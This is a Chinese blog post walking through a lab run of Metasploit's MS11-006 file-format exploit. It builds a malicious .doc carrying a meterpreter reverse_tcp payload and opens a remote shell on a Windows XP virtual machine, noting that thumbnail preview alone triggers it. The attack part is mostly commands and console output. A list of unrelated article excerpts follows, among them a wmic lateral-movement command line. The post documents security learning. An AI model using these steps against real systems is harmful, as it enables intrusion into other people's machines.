feier7501
feier7501

metasploit文件格式漏洞渗透攻击(成功获得shell)

环境BT5R1

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443 
[*] Starting the payload handler...
msf  exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf  exploit(handler) >

把msf.doc复制到XP里,一开始,双击,BT5没反应。

后来,我用缩略图来查看,不需要双击msf.doc,BT5就有反应了(书中说是要打开该文档,估计有误)。

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf  exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

如果换到简体中文版本的XP上面,用缩略图查看,则会失败,无法获得shell。


你可能感兴趣的:(metasploit文件格式漏洞渗透攻击(成功获得shell))

  • 不是只有写稿能用AI!教你用AI“模拟审稿人”帮论文过关 学境思源AcademicIdeas AI写作学境思源ChatGPT人工智能
    在AI辅助写作火遍学术圈之后,学境思源,越来越多作者开始发现:AI的真正威力,并不只是帮你一键生成论文初稿!“写”,而是可以反过来“像审稿人一样看你的论文”。acaids.com。这种“反向应用”,正成为提高论文录用率的关键利器。今天这篇文章就告诉你:如何用AI模拟审稿人视角,检查论文的逻辑漏洞、结构混乱、语言问题,甚至帮助你发现数据论证不足,提前做出修改。我们会重点介绍Paperpal、Writ
  • QUdpScoket 组播实现及其中的踩坑点记录 老猿啊老猿 Qtc++qtudp网络
    QUdpScoket组播实现及其中的踩坑点记录QUdpSocket要想组播需要打开MulticastTtlOption配置项,否则无法生效,亲身踩坑经历m_socket=newQUdpSocket(this);m_socket->setSocketOption(QAbstractSocket::MulticastTtlOption,1);确定一个组播地址,并且要在socket绑定成功进入Bound
  • 广州华锐互动携手中石油:AR 巡检系统实现重大突破 广州华锐视点 ar
    广州华锐互动在AR技术领域的卓越成就,通过一系列与知名企业、机构的成功合作案例得以充分彰显。其中,与中石油的合作项目堪称经典,展现了广州华锐互动运用AR技术解决实际难题、达成目标的强大实力。中石油作为能源行业的巨擘,在石油勘探、开采、运输和炼化等环节面临着诸多复杂的挑战。广州华锐互动与中石油携手,针对其油田设备巡检和员工培训等关键业务场景,开发了一套定制化的AR解决方案。在油田设备巡检方面,传统的
  • 程序和进程和线程的区别是什么? 小白之歌 Java
    程序和进程和线程的区别是什么?进程是操作系统资源分配的基本单位,线程是任务调度执行基本单位(CPU的基本调度单位),程序是静态的指令集合,而进程是运行中的指令集合。进程:程序的一次执行,答法1:进程间切换代价大,线程间切换代价小进程拥有资源多,线程拥有资源少多个线程共享进程的资源进程是分配资源的基本单位,而线程是独立运行和调度的基本单位。任意时刻,一个CPU只能运行一个进程,进程获得资源后进行分配
  • 网安知识“大乱炖“ Lovely_18 网安知识积累
    网安知识"大乱炖"Windows安全事件日志常用EventID:EventID含义说明4624登录成功表示用户成功登录系统4625登录失败✅表示登录尝试失败,是暴力破解最关键的日志标志4672特权登录表示具有管理员权限的账户登录(用于检测高权限账户活动)4648显式凭证登录用户在使用runas或远程方式提供用户名/密码登录暴力破解相关日志特征:连续触发大量4625登录失败来自同一个IP或多个IP的
  • Ubuntu基础(上传文件和部署Python) aaiier ubuntulinux运维
    首先打开[email protected]然后写yes,在输入密码然后就是输入ls/查看根目录ls/结果是ubuntu@x0-x-xx-xx:~$ls/binbootdevhomelib.usr-is-mergedlost+foundmntprocrunsbin.usr-is-mergedsrvtmpvarbin.usr-is-mergeddataetclibli
  • 100G QSFP28双纤单波光模块的高性价比解决方案 易天ETU 光模块信息与通信网络5G数据中心互联万兆光模块单波100G光模块QSFP28光模块
    我们都知道传统的100G光模块采用的都是4路25G的光学通道并行或波分复用进行传输的,目前市场上主流的光模块主要是100GSR4/CWDM4/PSM4/LR4/ZR4等。而我们今天为大家介绍的100G单波光模块,使用的是单波长100GPAM4调制技术,可以更好的降低生产成本和获得更高的传输效率。一、传统100G光模块和100G单波光模块的区别对比传统的100G光模块采用的是4x25GNRZ技术。使
  • 微信支付回调验证实战:构建防伪造请求的3道防火墙 IT莫染 工具及插件#配置SpringBootDemo微信SpringBoot3.2微信支付V3API数据签名防重放攻击
    ⚡痛点场景当你的电商系统遭遇:黑客伪造支付成功回调→0元订单自动发货重放攻击→单笔交易多次发货中间人篡改金额→1999元订单变成1.99元微信官方数据:未验签的回调接口被攻击概率高达73%安全架构三重防护️核心代码实现(SpringBoot≥3.1,JDK17+)防火墙1:签名验证(关键防伪造)@RestController@RequestMapping("/payment")publicclas
  • 横向移动02
    基于wmic的横向移动本文章中的192.168.3.32是目标地址,就是靶机ip地址条件:wmi服务开启,端口135,默认开启     防火墙允许135、445等端口通信     知道目标机的账户密码或HASH内置(单执行)shell wmic /node:192.168.3.32 /user:sqlserver\administrator /password:admin!@#123  proce
  • Mac 安装使用 Oh-my-zsh(持续更新) 运维阿峰 MacOSmacos
    文章目录1.介绍(1)zsh介绍(2)Oh-my-zsh介绍2.oh-my-zsh安装3.配置oh-my-zsh(1)配置主题(2)安装插件zsh官网:https://ohmyz.sh/1.介绍(1)zsh介绍zsh是一种shell(命令解释器),它兼容bash(另一种常见的shell)。zsh相比系统自带的bash有以下几个优点:Tab补全功能强大,在输入命令、命令参数以及文件路径时都能够自动补
  • QT-登录界面的实现 是桃萌萌鸭~ uiqtc++物联网数据库开发
    QT-登录界面的实现一、登录界面设计要求创建一个窗体,设计用户登录的界面(含有用户名、密码),并实现用户登录的功能,要求用户提交的登录按钮时能获取界面中的用户名、密码数据并与数据库中的数据进行匹配,若用户名,密码正确则登录成功,否则登录失败。二、具体实现过程1、图片演示2、详细代码实现(1)dialog.cpp:(登录界面.cpp文件)#include"dialog.h"#include"ui_d
  • Leetcode 3599. Partition Array to Minimize XOR Espresso Macchiato leetcode笔记leetcode3599leetcodemediumleetcode周赛456动态规划
    Leetcode3599.PartitionArraytoMinimizeXOR1.解题思路2.代码实现题目链接:3599.PartitionArraytoMinimizeXOR1.解题思路这一题就是一个动态规划的思路。我们定义动态规划的状态函数dp(idx,k)将数组arr[idx:]切分为kkk个子串之后能够获得的最大XOR的最小值。此时,我们就能有状态转移函数:dp(i,k)=minj=i+
  • pycharm——djiango之数据迁移,终端操作 Pop– python
    首先在pycharm中找到terminal(终端),输入指令:pythonmanage.pymakemigrations之后你会看到如下图:这表示创建成功。接着输入指令:pythonmanage.pymigrate就能看到好多ok,你在数据库中也能看到很多表你可以在终端打开数据库查看表,也可以使用客户端的可视化界面查看,还可以在pycharm中右边的database里边打开查看,如下图:之后你就可
  • Python基础(吃洋葱小游戏) aaiier pythonpygame开发语言
    下面我将为你设计一个"吃洋葱小游戏"的Python实现方案,使用Pygame库开发。这个游戏模拟吃洋葱的过程,玩家需要收集不同种类的洋葱以获得高分,同时避免吃到辣椒。吃洋葱小游戏-Python实现方案1.游戏设计概念游戏目标:玩家控制角色吃掉尽可能多的洋葱获得高分核心机制:洋葱从屏幕上方随机下落玩家左右移动角色接住洋葱不同洋葱有不同分值(普通洋葱+10,红洋葱+20,紫洋葱+50)辣椒会扣减生命值
  • 第5篇:Gin的数据验证与绑定——确保请求数据合法性 GO兔 gingolang后端
    引言在Web开发中,你是否遇到过这些令人头疼的问题?用户提交的表单数据格式混乱导致系统崩溃,恶意请求携带非法参数攻击API接口,或者因为数据校验不完善而引发的各种业务异常?这些问题的根源往往在于——我们没有在数据进入业务逻辑之前就建立起坚固的防线。今天,我将带你深入探索Gin框架的数据验证与绑定机制,教你如何用最少的代码构建最坚固的数据防护墙。一、数据绑定:自动化数据处理Gin框架最强大的特性之一
  • Linux离线安装mysql 为你奋斗! 开发环境软件安装androidadb
    Linux离线安装mysql(centos7)1、下载MySQL2、使用xshell文件传输工具,上传到Linux服务器3、安装前准备4、安装MySQL5、Navicat连接测试1、下载MySQLhttps://dev.mysql.com/downloads/mysql/5.7.html#downloads2、使用xshell文件传输工具,上传到Linux服务器在/usr/local文件夹下创建m
  • nacos配置文件快速部署另一种方法 谢平康 nacos
    提交nacos配置的另一种一种方法,批命令/shell:以下脚本直接把当前目录下的所有yaml文件一键提交到nacos上前提是要先安装curl以及jq然后把下面的shell保存为import-all.sh然后chmod+ximport-all.sh&&./import-all.sh就好了.记得修改一下的NAMESPACE_NAME与GROUP.#!/bin/bashclearset-e#Nacos
  • linux下用ffmpeg测试nvidia 显示驱动是否安装成功的脚本 谢平康 linuxffmpeg运维
    #!/bin/bash#生成一个10秒用户来测试的文件ffmpeg-y-flavfi-itestsrc=duration=10:size=1280x720:rate=30\-flavfi-isine=frequency=1000:duration=10\-c:vlibx264-presetfast-crf23\-c:aaac-b:a192k\input.mp4#测试输入文件(可替换为你自己的视频文
  • 在安卓设备上使用ADB Shell实现自动向微信好友发送消息的脚本 谢平康 androidadb微信
    安卓实现自动给微信好友发送消息的Shell脚本以下是一个简单的Shell脚本示例,用于通过ADB命令在安卓设备上自动打开微信,搜索指定好友,并发送消息。最后,通过截图来确认消息是否成功发送。脚本步骤1.打开微信adbshellamstart-ncom.tencent.mm/.ui.LauncherUI2.(可选)获取屏幕大小#如果需要基于屏幕大小进行坐标定位,可以使用以下命令#adbshellwm
  • ROS学习笔记5:常用API和模块导入
    前言本人ROS小白,利用寒假时间学习ROS,在此以笔记的方式记录自己每天的学习过程。争取写满15篇(5/15)。环境:Ubuntu20.04、ROS1:noetic环境配置:严格按照下方学习链接的教程配置,基本一次成功。学习链接:【Autolabor初级教程】ROS机器人入门对应链接文档:ROS机器人入门课程《ROS理论与实践》笔记绝大部分代码使用Python语言编写。本期关键词:初始化,话题服务
  • 《网络安全自学教程》- SQL注入漏洞详解 士别三日wyx 《网络安全自学教程》sql数据库网络安全安全web安全
    《网络安全自学教程》SQL注入的原理其实很简单:由于后端过滤不严格,把用户输入的数据当成SQL语句执行了。SQL注入1、SQL注入常出现在哪些功能?2、SQL注入危害3、SQL注入分类4、判断是否存在SQL注入5、SQL注入方式6、SQL注入防御6.1、预编译1、SQL注入常出现在哪些功能?凡是涉及「数据库操作的功能」,都有可能存在SQL注入,比如:搜索框等查询功能。用户注册/用户登录功能。密码找
  • UR Studio仿真工具上线助力协作机器人快速部署与精准配置模拟 欣佰特cnbestec 机器人优傲优傲机器人URStudioPolyScopeXAI协作机器人
    URStudio仿真工具是专为协作机器人自动化部署打造的一款集成化、在线式仿真平台。它基于PolyScopeXAI平台开发,提供从方案设计到仿真验证的一体化流程,帮助企业提升自动化项目的设计效率与实施成功率。工程师无需复杂操作即可快速上手,轻松应对多变的生产需求。无论是初学者还是资深用户,都能通过直观的界面完成仿真任务,实现智能制造的高效转型。URStudio仿真工具核心优势平台集成,提升协作效率
  • 什么是 PoW(工作量证明,Proof of Work) MonkeyKing.sun 区块链
    共识算法(ConsensusAlgorithm)是区块链的“心脏”,它决定了多个节点在没有中央机构的前提下,如何就“谁来记账”达成一致。什么是PoW(工作量证明,ProofofWork)定义:工作量证明(ProofofWork,简称PoW)是一种共识机制,要求节点通过解决一个高难度数学问题,来获得记账权。第一个算出答案的节点获得“打包交易→生成区块→获取奖励”的权利。它是比特币、以太坊(1.0)等
  • 区块链知识总结——POS权益证明 The_Killer. 区块链
    背景:pow由于其对资源的消耗而饱受争议。由此引入pos权益证明:posVSpow优缺点:1.节能2.pos是闭环生态,pow是开源生态。pos天然防范了51%攻击解释:pow之下,attacker可以在现实世界中购买矿机,来增加算力以达到51%attack目的,而pos下attacker必须购买更多的加密货币(相当于成为股东),才有发动attack的能力,但此时对币的开发者和早起的矿工其实是受益
  • 【区块链】区块链交易(Transaction)之nonce ZFJ_张福杰 区块链区块链web3nonce
    【区块链】区块链交易(Transaction)之nonce一、什么是nonce?nonce是发送方(账户)的交易计数器,表示该账户已经发送的交易数量。以太坊使用nonce来防止双重支付(doublespending)和重放攻击(replayattacks)。从0开始,每次交易都会增加1。交易必须按nonce顺序被区块链确认,否则会被拒绝。二、为什么需要nonce?防止交易重复:交易的nonce唯一
  • 什么是 PoS(权益证明) MonkeyKing.sun pos
    PoS(ProofofStake,权益证明)是区块链中常用的一种共识算法,作为PoW(工作量证明)的替代方案,它通过“持币数量+持有时间”决定谁有权记账(打包区块),从而降低能耗、提升效率。一、什么是PoS(权益证明)?PoS是一种基于“持有代币数量”的区块链共识机制,持币越多、持币越久,获得打包新区块机会的概率越高。换句话说,不是靠算力挖矿,而是靠“你拥有多少币”来竞争记账权。二、PoS的核心原
  • windows应用创建不了快捷方式?请看过来! Ailerx windows笔记经验分享
    今天看到了windows自带的微软的Todo,想把它放到桌面,然后我右键后看到有固定到任务栏的选项,但是并没有创建快捷方式的选项,当然不止这一个软件好多软件如果安装时没有创建快捷方式,创建快捷方式便很麻烦(需要找到如软件的具体路径),但是网上搜索时看到一个命令:shell:appsfolder。shell:appsfolder是一个Windows操作系统中的特殊命令,用于快速访问系统中安装的应用程
  • MySQL与SQL Server的差异及测试手法 ke0hly web安全安全网络安全
    SQL注入漏洞分析:MySQL与SQLServer的差异及测试手法引言如果系统使用的是SQLServer数据库,则可以实现写入Webshell,而MySQL则不行。本文将深入探讨这两种数据库在SQL注入场景下的差异,以及SQLServer如何利用SQL注入写入Webshell,并介绍其他常见的SQL注入攻击手法。MySQL与SQLServer在SQL注入写入Webshell上的差异SQL注入的本质
  • IP证书在网络安全中的作用 qwerdfwc_ 安全web安全网络
    IP证书(IPSSL证书)是SSL/TLS证书的一种,与传统的域名SSL证书不同,它直接绑定到服务器的IP地址而非域名,在网络安全中发挥着多方面的重要作用,以下是详细介绍:身份验证作用机制:IP证书由受信任的证书颁发机构(CA)颁发。在申请过程中,CA会对申请者的IP地址进行严格的身份验证,确保申请者对该IP地址拥有合法的控制权。只有通过验证的IP地址才能获得相应的证书。重要性:这种身份验证机制可
  • 保护生产中 Node.js 应用程序安全的 15 项最佳实践 梦玄海 node.js安全人工智能分布式音视频AI编程低代码
    为什么应该构建安全的Node.js应用程序?构建安全的Node.js应用程序非常重要,至少有以下三个原因:保护用户数据:您的应用程序可能会处理敏感的用户信息,如个人信息、登录凭证、支付数据或机密的业务见解。如果不能保护这些数据,您可能会被隐私监管机构处以数百万美元的罚款。通过实施强大的安全措施,您可以保护用户数据并避免法律问题。保护应用程序功能:安全漏洞可能会损害后端提供的功能。攻击者可能会利用弱
  • java工厂模式 3213213333332132 java抽象工厂
    工厂模式有 1、工厂方法 2、抽象工厂方法。 下面我的实现是抽象工厂方法, 给所有具体的产品类定一个通用的接口。 package 工厂模式; /** * 航天飞行接口 * * @Description * @author FuJianyong * 2015-7-14下午02:42:05 */ public interface SpaceF
  • nginx频率限制+python测试 ronin47 nginx 频率 python
           部分内容参考:http://www.abc3210.com/2013/web_04/82.shtml 首先说一下遇到这个问题是因为网站被攻击,阿里云报警,想到要限制一下访问频率,而不是限制ip(限制ip的方案稍后给出)。nginx连接资源被吃空返回状态码是502,添加本方案限制后返回599,与正常状态码区别开。步骤如下:
  • java线程和线程池的使用 dyy_gusi ThreadPoolthreadRunnabletimer
    java线程和线程池 一、创建多线程的方式     java多线程很常见,如何使用多线程,如何创建线程,java中有两种方式,第一种是让自己的类实现Runnable接口,第二种是让自己的类继承Thread类。其实Thread类自己也是实现了Runnable接口。具体使用实例如下: 1、通过实现Runnable接口方式 1 2
  • Linux 171815164 linux
    ubuntu kernel http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.1.2-unstable/ 安卓sdk代理 mirrors.neusoft.edu.cn        80 输入法和jdk sudo apt-get install fcitx su
  • Tomcat JDBC Connection Pool g21121 Connection
           Tomcat7 抛弃了以往的DBCP 采用了新的Tomcat Jdbc Pool 作为数据库连接组件,事实上DBCP已经被Hibernate 所抛弃,因为他存在很多问题,诸如:更新缓慢,bug较多,编译问题,代码复杂等等。        Tomcat Jdbc P
  • 敲代码的一点想法 永夜-极光 java随笔感想
                  入门学习java编程已经半年了,一路敲代码下来,现在也才1w+行代码量,也就菜鸟水准吧,但是在整个学习过程中,我一直在想,为什么很多培训老师,网上的文章都是要我们背一些代码?比如学习Arraylist的时候,教师就让我们先参考源代码写一遍,然
  • jvm指令集 程序员是怎么炼成的 jvm 指令集
    转自:http://blog.csdn.net/hudashi/article/details/7062675#comments       将值推送至栈顶时 const ldc  push   load指令 const系列 该系列命令主要负责把简单的数值类型送到栈顶。(从常量池或者局部变量push到栈顶时均使用) 0x02 &nbs
  • Oracle字符集的查看查询和Oracle字符集的设置修改 aijuans oracle
    本文主要讨论以下几个部分:如何查看查询oracle字符集、 修改设置字符集以及常见的oracle utf8字符集和oracle exp 字符集问题。 一、什么是Oracle字符集 Oracle字符集是一个字节数据的解释的符号集合,有大小之分,有相互的包容关系。ORACLE 支持国家语言的体系结构允许你使用本地化语言来存储,处理,检索数据。它使数据库工具,错误消息,排序次序,日期,时间,货
  • png在Ie6下透明度处理方法 antonyup_2006 css浏览器FirebugIE
    由于之前到深圳现场支撑上线,当时为了解决个控件下载,我机器上的IE8老报个错,不得以把ie8卸载掉,换个Ie6,问题解决了,今天出差回来,用ie6登入另一个正在开发的系统,遇到了Png图片的问题,当然升级到ie8(ie8自带的开发人员工具调试前端页面JS之类的还是比较方便的,和FireBug一样,呵呵),这个问题就解决了,但稍微做了下这个问题的处理。 我们知道PNG是图像文件存储格式,查询资
  • 表查询常用命令高级查询方法(二) 百合不是茶 oracle分页查询分组查询联合查询
    ----------------------------------------------------分组查询 group by    having   --平均工资和最高工资   select avg(sal)平均工资,max(sal)  from emp ;  --每个部门的平均工资和最高工资
  • uploadify3.1版本参数使用详解 bijian1013 JavaScriptuploadify3.1
    使用:     绑定的界面元素<input id='gallery'type='file'/>$("#gallery").uploadify({设置参数,参数如下}); 设置的属性: id: jQuery(this).attr('id'),//绑定的input的ID langFile: 'http://ww
  • 精通Oracle10编程SQL(17)使用ORACLE系统包 bijian1013 oracle数据库plsql
    /* *使用ORACLE系统包 */ --1.DBMS_OUTPUT --ENABLE:用于激活过程PUT,PUT_LINE,NEW_LINE,GET_LINE和GET_LINES的调用 --语法:DBMS_OUTPUT.enable(buffer_size in integer default 20000); --DISABLE:用于禁止对过程PUT,PUT_LINE,NEW
  • 【JVM一】JVM垃圾回收日志 bit1129 垃圾回收
    将JVM垃圾回收的日志记录下来,对于分析垃圾回收的运行状态,进而调整内存分配(年轻代,老年代,永久代的内存分配)等是很有意义的。JVM与垃圾回收日志相关的参数包括: -XX:+PrintGC -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -Xloggc -XX:+PrintGC 通
  • Toast使用 白糖_ toast
    Android中的Toast是一种简易的消息提示框,toast提示框不能被用户点击,toast会根据用户设置的显示时间后自动消失。     创建Toast 两个方法创建Toast makeText(Context context, int resId, int duration)     参数:context是toast显示在
  • angular.identity boyitech AngularJSAngularJS API
    angular.identiy 描述: 返回它第一参数的函数. 此函数多用于函数是编程. 使用方法: angular.identity(value); 参数详解: Param Type Details value * to be returned. 返回值: 传入的value 实例代码: <!DOCTYPE HTML>
  • java-两整数相除,求循环节 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class CircleDigitsInDivision { /** * 题目:求循环节,若整除则返回NULL,否则返回char*指向循环节。先写思路。函数原型:char*get_circle_digits(unsigned k,unsigned j)
  • Java 日期 周 年 Chen.H javaC++cC#
    /** * java日期操作(月末、周末等的日期操作) * * @author * */ public class DateUtil { /** */ /** * 取得某天相加(减)後的那一天 * * @param date * @param num *
  • [高考与专业]欢迎广大高中毕业生加入自动控制与计算机应用专业 comsci 计算机
          不知道现在的高校还设置这个宽口径专业没有,自动控制与计算机应用专业,我就是这个专业毕业的,这个专业的课程非常多,既要学习自动控制方面的课程,也要学习计算机专业的课程,对数学也要求比较高.....如果有这个专业,欢迎大家报考...毕业出来之后,就业的途径非常广.....      以后
  • 分层查询(Hierarchical Queries) daizj oracle递归查询层次查询
    Hierarchical Queries If a table contains hierarchical data, then you can select rows in a hierarchical order using the hierarchical query clause: hierarchical_query_clause::= start with condi
  • 数据迁移 daysinsun 数据迁移
    最近公司在重构一个医疗系统,原来的系统是两个.Net系统,现需要重构到java中。数据库分别为SQL Server和Mysql,现需要将数据库统一为Hana数据库,发现了几个问题,但最后通过努力都解决了。 1、原本通过Hana的数据迁移工具把数据是可以迁移过去的,在MySQl里面的字段为TEXT类型的到Hana里面就存储不了了,最后不得不更改为clob。 2、在数据插入的时候有些字段特别长
  • C语言学习二进制的表示示例 dcj3sjt126com cbasic
    进制的表示示例 # include <stdio.h> int main(void) { int i = 0x32C; printf("i = %d\n", i); /* printf的用法 %d表示以十进制输出 %x或%X表示以十六进制的输出 %o表示以八进制输出 */ return 0; }
  • NsTimer 和 UITableViewCell 之间的控制 dcj3sjt126com ios
    情况是这样的: 一个UITableView, 每个Cell的内容是我自定义的 viewA viewA上面有很多的动画, 我需要添加NSTimer来做动画, 由于TableView的复用机制, 我添加的动画会不断开启, 没有停止, 动画会执行越来越多.   解决办法: 在配置cell的时候开始动画, 然后在cell结束显示的时候停止动画   查找cell结束显示的代理
  • MySql中case when then 的使用 fanxiaolong casewhenthenend
    select "主键", "项目编号", "项目名称","项目创建时间", "项目状态","部门名称","创建人" union (select pp.id as "主键", pp.project_number as &
  • Ehcache(01)——简介、基本操作 234390216 cacheehcache简介CacheManagercrud
    Ehcache简介 目录 1       CacheManager 1.1      构造方法构建 1.2      静态方法构建 2       Cache 2.1&
  • 最容易懂的javascript闭包学习入门 jackyrong JavaScript
    http://www.ruanyifeng.com/blog/2009/08/learning_javascript_closures.html 闭包(closure)是Javascript语言的一个难点,也是它的特色,很多高级应用都要依靠闭包实现。 下面就是我的学习笔记,对于Javascript初学者应该是很有用的。 一、变量的作用域 要理解闭包,首先必须理解Javascript特殊
  • 提升网站转化率的四步优化方案 php教程分享 数据结构PHP数据挖掘Google活动
    网站开发完成后,我们在进行网站优化最关键的问题就是如何提高整体的转化率,这也是营销策略里最最重要的方面之一,并且也是网站综合运营实例的结果。文中分享了四大优化策略:调查、研究、优化、评估,这四大策略可以很好地帮助用户设计出高效的优化方案。 PHP开发的网站优化一个网站最关键和棘手的是,如何提高整体的转化率,这是任何营销策略里最重要的方面之一,而提升网站转化率是网站综合运营实力的结果。今天,我就分
  • web开发里什么是HTML5的WebSocket? naruto1990 Webhtml5浏览器socket
    当前火起来的HTML5语言里面,很多学者们都还没有完全了解这语言的效果情况,我最喜欢的Web开发技术就是正迅速变得流行的 WebSocket API。WebSocket 提供了一个受欢迎的技术,以替代我们过去几年一直在用的Ajax技术。这个新的API提供了一个方法,从客户端使用简单的语法有效地推动消息到服务器。让我们看一看6个HTML5教程介绍里 的 WebSocket API:它可用于客户端、服
  • Socket初步编程——简单实现群聊 Everyday都不同 socket网络编程初步认识
    初次接触到socket网络编程,也参考了网络上众前辈的文章。尝试自己也写了一下,记录下过程吧:   服务端:(接收客户端消息并把它们打印出来)   public class SocketServer { private List<Socket> socketList = new ArrayList<Socket>(); public s
  • 面试:Hashtable与HashMap的区别(结合线程) toknowme
    昨天去了某钱公司面试,面试过程中被问道 Hashtable与HashMap的区别?当时就是回答了一点,Hashtable是线程安全的,HashMap是线程不安全的,说白了,就是Hashtable是的同步的,HashMap不是同步的,需要额外的处理一下。   今天就动手写了一个例子,直接看代码吧 package com.learn.lesson001; import java
  • MVC设计模式的总结 xp9802 设计模式mvc框架IOC
    随着Web应用的商业逻辑包含逐渐复杂的公式分析计算、决策支持等,使客户机越 来越不堪重负,因此将系统的商业分离出来。单独形成一部分,这样三层结构产生了。 其中‘层’是逻辑上的划分。 三层体系结构是将整个系统划分为如图2.1所示的结构[3] (1)表现层(Presentation layer):包含表示代码、用户交互GUI、数据验证。 该层用于向客户端用户提供GUI交互,它允许用户
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他